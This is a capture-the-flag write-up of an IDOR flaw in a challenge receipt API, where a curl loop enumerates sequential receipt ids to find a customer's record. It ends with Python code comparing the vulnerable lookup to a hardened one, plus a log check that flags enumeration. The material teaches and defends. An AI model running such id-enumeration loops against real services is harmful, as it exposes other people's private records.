I’m Josh Wright - teetotal, run on about 4 hours’ sleep, and into pre-1900 photography. Teaching hacking and defense is my thing.
A gnome slipped through Sasabune pretending to be human - asking for frozen sushi (yikes). From past work on IDOR bugs in restaurant payment systems, I think a similar vulnerability is here.
Task: Use the receipt to investigate an IDOR-style flaw in the payment system and unmask the gnome.
First, we look at the bill we found behind the building, scan the QR code, and send ourselves the link.
https://its-idorable.holidayhackchallenge.com/receipt/i9j0k1l2
Looking at the request in the browser's developer tools shows that the receipt page fetches its data from an API endpoint that takes a plain numeric receipt id, with nothing tying that id to the person holding the receipt link; that is the IDOR.
https://its-idorable.holidayhackchallenge.com/api/receipt?id=103
With a small Bash one-liner, we iterate over the IDs and quickly find the name of the gnome we are looking for:
for i in {1..140}; do curl -s "https://its-idorable.holidayhackchallenge.com/api/receipt?id=$i" | grep frozen; done
{"customer":"Bartholomew Quibblefrost","date":"2025-12-20","id":139,"items":[{"name":"Frozen Roll (waitress improvised: sorbet, a hint of dry ice)","price":19.0}],"note":"Insisted on increasingly bizarre rolls and demanded one be served frozen. The waitress invented a 'Frozen Roll' on the spot with sorbet and a puff of theatrical smoke. He nodded solemnly and asked if we could make these in bulk.","paid":true,"table":14,"total":19.0}
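As an added example (not part of this write-up or the challenge's own backend), here is the receipt lookup written both ways, the guessable-id version that causes the bug and a version keyed on the unguessable token from the /receipt/i9j0k1l2 link with an ownership check, plus a small log check for the sequential-id enumeration pattern the one-liner produces. The in-memory store, the owner field and the log line format are assumptions.

```python
import re
import secrets
from collections import defaultdict

# Constructed sample store (assumed model, not the challenge's backend): each receipt
# has a sequential id like the page's ?id=103 plus an unguessable token like the
# /receipt/i9j0k1l2 link, and an owner bound to the session that paid it.
RECEIPTS = {
    103: {"customer": "Alice", "owner": "alice", "token": "i9j0k1l2", "total": 42.0},
    139: {"customer": "Bartholomew Quibblefrost", "owner": "bart",
          "token": secrets.token_urlsafe(8), "total": 19.0},
}
TOKEN_INDEX = {r["token"]: rid for rid, r in RECEIPTS.items()}


def vulnerable_get_receipt(receipt_id):
    """The IDOR: a guessable id is the only key and nothing ties it to the caller."""
    return RECEIPTS.get(receipt_id)


def hardened_get_receipt(token, session_user):
    """Resolve the unguessable token, then require that the caller owns the record.
    Returns None for both 'no such token' and 'not yours' so the response does not
    reveal which receipts exist; the handler maps None to a single 404.
    """
    rid = TOKEN_INDEX.get(token)
    if rid is None or session_user is None:
        return None
    record = RECEIPTS[rid]
    return record if record["owner"] == session_user else None


LOG_LINES = [  # constructed access-log lines in a minimal "client verb path" form
    "10.0.0.7 GET /api/receipt?id=101",
    "10.0.0.7 GET /api/receipt?id=102",
    "10.0.0.7 GET /api/receipt?id=103",
    "10.0.0.7 GET /api/receipt?id=104",
    "10.0.0.7 GET /api/receipt?id=105",
    "10.0.0.9 GET /api/receipt?id=139",
]


def flag_enumeration(lines, threshold=5):
    """Detection: clients that fetched at least `threshold` distinct receipt ids."""
    seen = defaultdict(set)
    for line in lines:
        m = re.match(r"(\S+) GET /api/receipt\?id=(\d+)$", line)
        if m:
            seen[m.group(1)].add(int(m.group(2)))
    return sorted(ip for ip, ids in seen.items() if len(ids) >= threshold)
```

A real deployment would also rate-limit the endpoint and serve the same 404 body for missing and foreign receipts, so the existence of neighbouring ids cannot be inferred from the response.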